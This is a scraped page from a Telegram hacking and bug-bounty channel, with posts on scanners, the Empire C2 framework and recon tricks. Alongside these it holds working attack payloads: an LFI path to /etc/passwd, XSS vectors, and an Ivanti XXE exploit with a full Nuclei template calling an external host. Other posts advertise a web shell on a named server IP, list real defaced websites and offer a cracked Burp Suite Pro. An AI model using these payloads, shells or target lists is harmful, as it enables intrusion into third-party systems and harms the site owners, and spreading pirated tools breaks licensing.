BugCod3
7.26K subscribers
334 photos
6 videos
7 files
444 links
[ BugCod3 ] โ€” From Shadows To Shells โšก๏ธ

๐Ÿ•ถ Hacking | ๐Ÿž Bug Bounty | ๐Ÿ” Security Tools
โš”๏ธ Learn โ€ข Hunt โ€ข Dominate

๐Ÿ‘ฅ Group: T.me/BugCod3GP
๐Ÿ“‚ Topic: T.me/BugCod3Topic

๐ŸŒ Web: BugCod3.com
๐Ÿค– Contact: T.me/BugCod3BOT
๐Ÿ“ง Email: BugCod3@protonmail.com
Download Telegram
NetProbe: Network Probe

๐Ÿ’ฌ
NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to any IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.

๐Ÿ“Š Features:
โšช๏ธ Scan for devices on a specified IP address or subnet
โšช๏ธ Display the IP address, MAC address, manufacturer, and device model of discovered devices
โšช๏ธ Live tracking of devices (optional)
โšช๏ธ Save scan results to a file (optional)
โšช๏ธ Filter by manufacturer (e.g., 'Apple') (optional)
โšช๏ธ Filter by IP range (e.g., '192.168.1.0/24') (optional)
โšช๏ธ Scan rate in seconds (default: 5) (optional)

๐Ÿ”ผ Installation:
cd NetProbe
pip install -r requirements.txt


๐Ÿ’ป Usage:
python3 netprobe.py โ€”help


๐Ÿ“‚ Example:
python3 netprobe.py -t 192.168.1.0/24 -i eth0 -o results.txt -l


๐Ÿ˜ธ Github

โฌ‡๏ธ Download
๐Ÿ”’ BugCod3

#Python #Network #Scanner #Vulnerability #Tools
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก4โค3๐Ÿ”ฅ1
PHP: 8.1.27

Safe Mode: OFF

ServerIP: 213.158.95.90 [๐Ÿ‡ฎ๐Ÿ‡น]

HDD: Total:1536.00 GB
Free:1322.97 GB [86%]

useful:--------------

Downloader: --------------

Disable Functions: All Functions Accessible

CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : OFF

Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE

SoftWare: nginx/1.22.0

๐Ÿ”— Link

Enjoy... โญ๏ธ

#Shell
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ”ฅ 0Day.Today
๐Ÿ“ฃ T.me/BugCod3
๐Ÿ“ฃ T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก4โค1๐Ÿ‘1๐Ÿ”ฅ1
I found a url like this :
https://domain.io/redirect?url=some_base_64_encoded_string

encoded javascript:alert("Xss by vikas") to base64 like :
amF2YXNjcmlwdDphbGVydCgiWHNzIGJ5IHZpa2FzIik=

Now the new url is like this :
https://domain.io/redirect?`url=amF2YXNjcmlwdDphbGVydCgiWHNzIGJ5IHZpa2FzIik=`

๐Ÿ“˜ Twitter

#bugbounty #xss #infosec
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โค2๐Ÿ”ฅ2โšก1๐Ÿคฃ1
ALWAYS test 404 Not Found in Bug Bounties!

๐Ÿ”— Medium
๐Ÿ”— Freedium

#Writeup
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โค5โšก1๐Ÿ‘1๐Ÿ”ฅ1
๐Ÿ‘‹ LFI Payload ๐Ÿ‘‹

Payload:
".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"

#bugbountytips #bugbounty #CyberSecurity
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โค3๐Ÿ”ฅ2โคโ€๐Ÿ”ฅ1โšก1
CVE-2024-22024

XXE on Ivanti Connect Secure

โ˜ ๏ธ payload encoded base64:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r>

send it to:
127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm

#bugbountytips #cve #Ivanti
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก2โค2๐Ÿ”ฅ1
JSON Smuggling: A far-fetched intrusion detection evasion technique

๐Ÿ”— Medium

#infosec #cybersecurity #blueteam
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก2โค1๐Ÿ”ฅ1
Nuclei PoC for Ivanti XXE (CVE-2024-22024)

id: CVE-2024-22024

info:
name: Ivanti Connect Secure - XXE
author: watchTowr
severity: high
description: |
Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.
impact: |
Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information or remote code execution.
remediation: |
Apply the latest security patches or updates provided by Ivanti to fix the XXE vulnerability.
reference:
- https://labs.watchtowr.com/are-we-now-part-of-ivanti/
- https://twitter.com/h4x0r_dz/status/1755849867149103106/photo/1
metadata:
max-request: 1
vendor: ivanti
product: "connect_secure"
shodan-query: "html:\"welcome.cgi?p=logo\""
tags: cve,cve2024,kev,xxe,ivanti

variables:
payload: '<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM
"http://{{interactsh-url}}/x"> %watchTowr;]><r></r>'

http:
- raw:
- |
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

SAMLRequest={{base64(payload)}}

matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"

- type: word
part: body
words:
- '/dana-na/'
- 'WriteCSS'
condition: and
# digest: 490a0046304402206a39800bff0d9ca85a05e3686a0e246f8d5504a38e8501a1d7e8684ae6f2853002205ba7c74bb1f99cacf693e8a5a1cd429dcd7e52fab188beb8c95b934e4aabcd57:922c64590222798bb761d5b6d8e72950


#Nuclei #Templates #PoC #XXE
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก2๐Ÿค”2โค1โคโ€๐Ÿ”ฅ1๐Ÿ‘1
๐Ÿฅฉ PDF

#Wordlist #PDF
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โค2โšก2๐Ÿ”ฅ1
๐Ÿ•ธ Site:
https://www.sergiocardozo.paineladvocacia.com/
http://acesso.paineladvocacia.com/
https://maioranoadvocacia.com/
http://smart.wecaninfotech.com/
https://tropicanarestaurants.com/index.php
https://madein.az/index.html

๐Ÿ‘โ€๐Ÿ—จ Mirror-h

Country: ๐Ÿ‡บ๐Ÿ‡ธ๐Ÿ‡น๐Ÿ‡ญ

#Deface
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ“ฃ T.me/BugCod3
๐Ÿ“ฃ T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก2โค1๐Ÿ”ฅ1
๐Ÿ‘‘ Empire ๐Ÿ‘‘

๐Ÿ’ฌ
Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers. The Empire server is written in Python 3 and is modular to allow operator flexibility. Empire comes built-in with a client that can be used remotely to access the server. There is also a GUI available for remotely accessing the Empire server, Starkiller.

๐Ÿ“Š Features:
โšช๏ธ Server/Client Architecture for Multiplayer Support
โšช๏ธ Supports GUI & CLI Clients
โšช๏ธ Fully encrypted communications
โšช๏ธ HTTP/S, Malleable HTTP, OneDrive, Dropbox, and PHP Listeners
โšช๏ธ Massive library (400+) of supported tools in PowerShell, C#, & Python
โšช๏ธ Donut Integration for shellcode generation
โšช๏ธ Modular plugin interface for custom server features
โšช๏ธ Flexible module interface for adding new tools
โšช๏ธ Integrated obfuscation using ConfuserEx 2 & Invoke-Obfuscation
โšช๏ธ In-memory .NET assembly execution
โšช๏ธ Customizable Bypasses
โšช๏ธ JA3/S and JARM Evasion
โšช๏ธ MITRE ATT&CK Integration
โšช๏ธ Integrated Roslyn compiler (Thanks to Covenant)
โšช๏ธ Docker, Kali, ParrotOS, Ubuntu 20.04/22.04, and Debian 10/11/12 Install Support

๐Ÿ”ผ Install:
cd Empire
./setup/checkout-latest-tag.sh
./setup/install.sh


๐Ÿ˜ธ Github

#Hacktoberfest #C2 #Redteam #Infrastructure
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ“ฃ T.me/BugCod3
๐Ÿ“ฃ T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก2โค1๐Ÿ‘1๐Ÿ”ฅ1
Adding 2 new blind XSS payloads to the XSS scanner payload vault ๐Ÿ˜Ž

'"><Svg Src=//{CANARY_TOKEN}/s OnLoad=import(this.getAttribute('src')+0)>

AND

'"><Img Src=//{CANARY_TOKEN}/x Onload=import(src+0)>

#XSS #Bugbounty #Tip
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก5โค2๐Ÿ”ฅ1
Bbal - Eye to Eye
Johar Records
โšก2๐Ÿ”ฅ2๐Ÿ‘€1
Linux for Hackers: LINUX commands you need to know

โฌ‡๏ธ Download

#linux #hacker #video
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ“ฃ T.me/BugCod3
๐Ÿ“ฃ T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก2โค1๐Ÿ”ฅ1
๐Ÿ‘ Burpsuite Pro ๐Ÿ‘

๐Ÿ”ฅ v2024.1.1.1

๐Ÿ”” BurpBountyPro_v2.8.0 โž•

๐Ÿ“‚ README (en+ru) included, plz read it before run BS.

๐Ÿ”ผ Run with Java 18 (JDK for Win included)

โฌ‡๏ธ Download
๐Ÿ”’ 311138

#Burpsuite #Pro #Tools
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก4๐Ÿ”ฅ2โค1๐Ÿ‘1๐Ÿคฃ1
๐Ÿ•ธ Site:
https://tysonmcguffin.com/index.html
https://bilberrybears.com/
https://flighttouch.com/
https://www.cameratouch.flighttouch.com/
https://mail.flighttouch.com/

๐Ÿ‘โ€๐Ÿ—จ Mirror-h

Country: ๐Ÿ‡บ๐Ÿ‡ธ๐Ÿ‡ช๐Ÿ‡ธ

#Deface
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ“ฃ T.me/BugCod3
๐Ÿ“ฃ T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
โค3โšก3๐Ÿ”ฅ1
โœ… H1 asset fetcher โœ…

๐Ÿ’ฌ
This h1finder.sh is script which collect all program names and then collect all assets and save it into wild and non-wild domains

You can get your API key from ๐Ÿ‘‰HackerOne๐Ÿ‘ˆ

๐Ÿ”ผ Installation:
cd h1-asset-fetcher
chmod +x h1finder
mv h1finder /usr/bin/


๐Ÿ’ป Usage:
h1finder -t <token> -u <username> -b <true/false>


โšช๏ธ -t = H1 token
โšช๏ธ -u = h1 username
โšช๏ธ -b = true or false, if you want bounty only target set it to true if you want vdp only set it to false

๐Ÿ˜ธ Github

โฌ‡๏ธ Download
๐Ÿ”’ BugCod3

#BugBounty #Tips #Tools
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก3โค1๐Ÿ‘1๐Ÿ”ฅ1
โ€ผ๏ธ PoC + Nuclei + Query CVE-2024-25600 Unauth RCE - WordPress Bricks <= 1.9.6 CVSS 9.8 โ€ผ๏ธ

Query Fofa: body="/wp-content/themes/bricks/"

๐Ÿ“ž PoC
๐ŸŒ Nuclei Template

#BugBounty #Tips #Nuclei #Template
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก3โค2๐Ÿ‘1๐Ÿ”ฅ1
This media is not supported in your browser
VIEW IN TELEGRAM
๐Ÿ‘บ Free query shodan 1000 result IP "Tips bug bounty" ๐Ÿ‘บ

Example query:
https://shodan.io/search/facet?query=hostname%3A*.apnic.net&facet=ip

Download source page

Regex:
grep '<strong>' shodan.html | cut -d '>' -f 4 | cut -d '<' -f 1

#BugBounty #Tips
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก3โค1๐Ÿ”ฅ1
๐Ÿ‘ป All-In-One Regex ๐Ÿ‘ป

๐Ÿ’ฌ
for searching leaked keys and secrets is a must-have. Here is how I was able to find a P1 recently using BurpSuite, The leaked secrets allowed me to see some employee related juicy info.

โฌ‡๏ธ Download
๐Ÿ”’ BugCod3

#BugBounty #Tips
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก4โค2๐Ÿ”ฅ2